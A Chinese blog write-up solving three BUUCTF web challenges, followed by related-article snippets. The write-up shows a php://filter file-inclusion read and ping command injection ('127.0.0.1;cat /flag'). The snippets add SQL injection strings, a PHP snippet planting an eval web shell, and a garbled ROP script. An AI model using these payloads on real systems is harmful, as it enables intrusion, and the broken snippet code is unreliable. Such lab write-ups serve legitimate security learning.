Buuctf-WEB简单的3套题

最新推荐文章于 2024-11-25 22:57:33 发布
最新推荐文章于 2024-11-25 22:57:33 发布
阅读量422 收藏
点赞数
分类专栏: WEB 文件包含 Bugku 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yuanxu8877/article/details/129964375
版权
文章介绍了BuUCTF和ACTF2020新生赛中的三道题目,涉及文件包含和命令执行的漏洞利用。在Havefun中,通过GET参数获取flag;在Include1中,利用base64编码读取flag.php源码获取flag;在Exec中,通过命令执行找到并读取根目录下的flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

Buuctf-WEB

题目地址BUUCTF

[极客大挑战 2019]Havefun

比较简单的题目

打开网页看着很简单,只有一个动图,直接查看源代码

在最下面有注释代码,对代码进行分析

$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
echo 'Syc{cat_cat_cat_cat}';
}

分析可得如果当get传参为dog时,输出Syc{cat_cat_cat_cat},直接输入get参数cat

获取到flag

[ACTF2020 新生赛]Include1

题目已经进行了提示,文件包含漏洞,其实文件包含漏洞相对比较简单,参考这篇文章文件包含漏洞总结都在这里了。第一反应是base64读源码,本题到这里也就结束了。

打开后发现有个tips,直接点开,观察链接,可以基本确定文件包含形式

直接base64读取flag.php源码
?file=php://filter/convert.base64-encode/resource=flag.php

可以看到falg.php的源码已经被读取出来了,base64解密

获得flag

[ACTF2020 新生赛]Exec

通过提示,可以发现为命令执行题目。打开网页发现为ping命令执行

ping的命令执行最困难的在于绕过,套路都比较固定,可以参考这篇文章命令执行

首先测试本地ping,发现能ping通,直接运用分号阶段命令执行。
127.0.0.1;ls

此处可以发现ls命令执行成功了,接下来的思路就是运用命令寻找flag了,其实做得多了通过经验分析,一般flag都在根目录下或者tmp文件夹或者php源码中,在这里直接找找根目录。
127.0.0.1;ls /

在根目录下直接发现flag。读取flag即可
127.0.0.1;cat /flag

BUUCTF靶场-web篇(一)
weixin_49349476的博客
03-24 620
BUUCTF靶场-web篇,EasySQL、include1、Havefun(WP)、Exec1
WEB-几道简单WEB
zippo1234的博客
11-03 1099
WEB-几道简单WEB几道简单WEB第一:extract变量覆盖1.题目2.函数介绍3.变量覆盖漏洞4.构造payload第二:git泄露1.题目2.扫描目录3.上工具(1)githack(2)git log查看历史记录(3)恢复现场4.get flag第三:is_numeric绕过1.题目2.函数分析3.绕过4.payload5.get flag结语 每天一,只能多不能少 几道简单WEB 第一:extract变量覆盖 1.题目 源代码: $flag='xxxx'; extract($
BUUCTF——Web1
2201_75331136的博客
07-17 942
打开靶机,出现以下页面查看源代码发现Secret.php,访问后出现以下页面接着我们使用bp进行抓包在请求头中添加字段发送请求,出现以下页面根据提示更改User-Agent为发送请求,出现以下页面提示要是来自本地的访问请求,联想到127.0.0.1,需要X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。出现flagflag为。
解记录-BUUCTF|Web (持续更新中)
weixin_57448435的博客
09-17 3016
BUUCTF Web
BUUCTF_Web题目解记录2
Altering_Ji的博客
07-11 1110
记录三道做过的buu CTF刷平台上的web类型题目,[MRCTF2020]Ez_bypass、[极客大挑战 2019]BuyFlag、[MRCTF2020]你传你🐎呢,考点包括代码审计和文件上传等
BUUCTF-Web解(持续更新中)
2301_80281749的博客
11-25 2273
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
Buuctf-Web-[极客大挑战 2024]EasySQL 1 解及思路总结
2401_84281594的博客
04-28 826
SQL注入在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
BUUCTF-WEB
ccfly1012的博客
11-02 4076
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
2024年网络安全最新Buuctf-Web-[极客大挑战 2024]EasySQL 1 解及思路总结
2401_84264096的博客
05-03 1352
例如输入1)、1"、1-等,这些数字后面的字符不是闭合符,所以数据库会把这些输入的错误数据转换成正确的数据类型。但是,若输入的数字后面的字符恰好是闭合符,则会形成闭合。原理:当闭合字符遇到转义字符时,会被转义,那么没有闭合符的语句就不完整了,就会报错,通过报错信息我们就可以推断出闭合符。时,没有SQL语句报错,只是提示我们输入的值是不对的,因此我们可以先假设SQL语句闭合方式是单引号。分析报错信息:看\斜杠后面跟着的字符,是什么字符,它的闭合字符就是什么,若是没有,就为数字型。可知此页面与数据库产生交互。
Buuctf-Web-[极客大挑战 2019]EasySQL 1 解及思路总结
ccc6553584的博客
04-03 1043
输入11"时,没有SQL语句报错,只是提示我们输入的值是不对的,因此我们可以先假设SQL语句闭合方式是单引号username输入1时,形成的sql语句是username输入1"时,形成的sql语句是正确的当字符串内需要包含双引号时,除了使用转义字符外,也可以使用一对单引号来包括字符串。字符串内的双引号被视为普通字符,无需特殊处理同理,当字符串内需要包含单引号时,除了使用转义字符外,也可以使用一对双引号来包括字符串。字符串内的单引号被视为普通字符,无需特殊处理username输入的是1'
记一次很简单web——CTFshow-WEB(1-4)
世间繁华梦一出
01-21 1136
CTFshow之Webweb1WEB2—SQL注入WEB3php文件包含 web1 签到,直接查看网页源代码,发现注释中有一串字符 ZmxhZ3s1NDliMDkyYi0yYzkwLTQ1MTktYmY5OC05YTg0MmI4MTdkODV9 将此字符串进行base64解码即可得到flag WEB2—SQL注入 题目提示是简单的SQL注入,于是尝试输入点中使用万能密码:admin'or 1=1# 之后发现有回显,说明存在sql注入,且用户名是ctfshow 接下来进行order by 判断字段数
php代码审计
m0_75178803的博客
10-09 189
1.题目来源:[极客大挑战 2019]Havefun1。就是要求我们用get请求传入一个cat=dog的值。我们来审计一下这段代码。
3-web端面试
小咸鱼er
03-29 430
1、从哪些方面开展测试   2、测试UI界面,有哪些主要测试点   3、与外部系统有交互时,有哪些主要测试点   4、兼容测试时,有哪些主要测试点   5、注册功能,有哪些主要测试点   6、登录功能,有哪些主要测试点   7、查询功能,有哪些主要测试点   8、表单有哪些主要测试点   9、Cookies有哪些主要测试点   10、描述浏览器中打开一个网页,浏览器与服务器之间的交互过程   11、B/S架构的优缺点   12、http与https的区别   13、POST与GET的区别   14、Web
【CTF】buuctf web 详解(持续更新)
热门推荐
m0_52923241的博客
08-12 5万+
buuctf web[HCTF 2018]WarmUp[极客大挑战 2019]EasySQL[极客大挑战 2019]Havefun[强网杯 2019]随便注[ACTF2020 新生赛]Include[SUCTF 2019]EasySQL[极客大挑战 2019]Secret File[ACTF2020 新生赛]Exec[极客大挑战 2019]LoveSQL[GXYCTF2019]Ping Ping Ping[极客大挑战 2019]Knife[极客大挑战 2019]Http[RoarCTF 2019]Easy
ctfshow web(1-6)刷
qidiandexiaowu
11-30 758
目录web2 最简单的SQL注入 web2 最简单的SQL注入 尝试用万能密码。 admin ' or 1=1= # 登陆成功。 大概知道了闭合符号是‘ 然后构造payload:1' order by 3 # 用了怎么也没有出现回显位。 后来请教了学长了,才知道数据库里没有1这个数据,所以我们要使用or 1=1 order by 4 #才行。 因为 or是一真即真。1=1为永真,所以才可以执行我们后面的语句。 还有另一种方法到后面再说。 抓包看一下 右击发送给repeater payload:use
buuctf web(Havefun)
a34376764的博客
03-13 398
打开网页,发现一只猫除此之外没什么可用信息了,打开web开发者工具,发现了这样一行注释。 <!-- $cat=$_GET['cat']; echo $cat; if($cat=='dog'){ echo 'Syc{cat_cat_cat_cat}'; } --> 注释的大概意思便是需要赋值将“cat=dog”后,能得到一个大概像是flag的玩意(主要是格式像)。操作后,...
[极客大挑战 2019]Havefun
m0sway的博客
02-16 116
BUU Web题目 [极客大挑战 2019]Havefun WriteUp
BUUCTF-Web-题目详解(持续更新……)
AkangBoy的博客
12-11 4982
本文介绍BUUCTF平台上,web题目的详解过程,持续更新
buu刷1.2
ooooohhhhhhh博客
10-28 134
1.2.1[极客大挑战 2019]EasySQL 随便输入一个账号和密码,显示如下界面 判断一下是否存在sql注入 出现报错,说明存在SQL注入漏洞 构造一个url,让无论账号和密码输入正确或者错误都为真,能够登录成功 http://f7c0ad9c-3f3f-443b-a0ef-6faf2b97c32c.node3.buuoj.cn/check.php?username=admin'or'1'='1&password=admin'or'1'='1 1.2.2[极客大
buuctf-[BJDCTF2020]认真你就输
最新发布
03-31
### 关于BUUCTF BJDCTF2020 “认真你就输”的解思路 #### 赛事背景与题目概述 在BJDCTF 2020赛事中,“认真你就输”是一道典型的Web安全挑战。这类题目通常涉及常见的漏洞利用技术,例如文件上传绕过、反序列化攻击以及命令注入等[^1]。 #### 文件上传与反序列化的结合 根据已知的参考资料,可以推测该题目可能涉及到图片马(PHP反序列化利用)。通过构造恶意的文件名或者文件内容,选手可以在服务器端触发特定的安全机制漏洞并最终获取Shell访问权限[^2]。具体来说: - **图片马**:这是一种将恶意代码嵌入到看似正常的图像文件中的方法。由于许多应用允许用户上传头像或其他类型的媒体文件,因此这种技巧非常有效。 - **PHP反序列化**:当应用程序接受来自用户的序列化数据并将它们存储或传递给其他组件时,如果这些数据被篡改为包含有害指令,则可能导致远程代码执行等问发生。 以下是基于上述理论的一个简单示例脚本用于演示如何创建一个基本的“图片木马”,请注意这仅作为学习用途展示概念而非实际操作指南: ```php <?php class Exploit { public $cmd; function __construct($command){ $this->cmd=$command; } } $payload = new Exploit(&#39;echo "<?php @eval(\$_POST[\&#39;password\&#39;]);?>"> /var/www/html/shell.php&#39;); file_put_contents("exploit.png", serialize($payload)); ?> ``` 此代码片段定义了一个名为`Exploit`的对象类,并设置其属性为要执行的一条Linux Shell命令字符串;接着实例化此类对象的同时传入相应的参数值完成初始化过程;最后把整个对象保存成PNG格式文件以便后续提交至目标站点进行测试验证工作。 #### 利用ROP链突破防护措施 对于某些情况下存在额外保护层的情况(比如堆栈溢出),可以通过构建Return-Oriented Programming (ROP)链条来规避检测进而达成目的。这里提到三种主要解决方案之一便是按照既定流程依次向堆栈推入所需参数直至满足条件跳转回指定位置继续运行剩余部分逻辑[^3]。 另外一种常见手法则是借助动态链接库(DLLs)/共享对象(SOs)内的现有功能重新配置受影响区域内存页表项标志位从而赋予相应范围读/写/执权能以加载自定义编写好的shellcode片段加以控制接管进程上下文环境达到预期成果表现形式如下所示: 假设我们已经成功泄露libc基址,那么就可以计算得到system函数偏移量以及"/bin/sh"字符串所在地址. ```python from pwn import * p=remote(&#39;challenge-address&#39;,port_number) offset_system=u64(leak_libc_base_addr)+known_offset_to_system_function arg_bin_sh=u64(leak_libc_base_addr)+known_offset_to_string_binsh rop=pwndbg.rop.Rop() rop.raw(offset_system) rop.raw(arg_bin_sh) payload=b&#39;A&#39;*buffer_size+rop.chain() p.sendline(payload) p.interactive() ``` 以上Python脚本展示了如何连接远程服务发送精心设计的数据包触发缓冲区越界错误暴露底层操作系统接口调用实现交互式终端会话建立全过程. #### 实际Payload的应用场景说明 最后参照给出的例子得知只需往URL查询参数附加特殊构造的内容就能轻易拿下flag得分结束比赛环节[^4]. ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值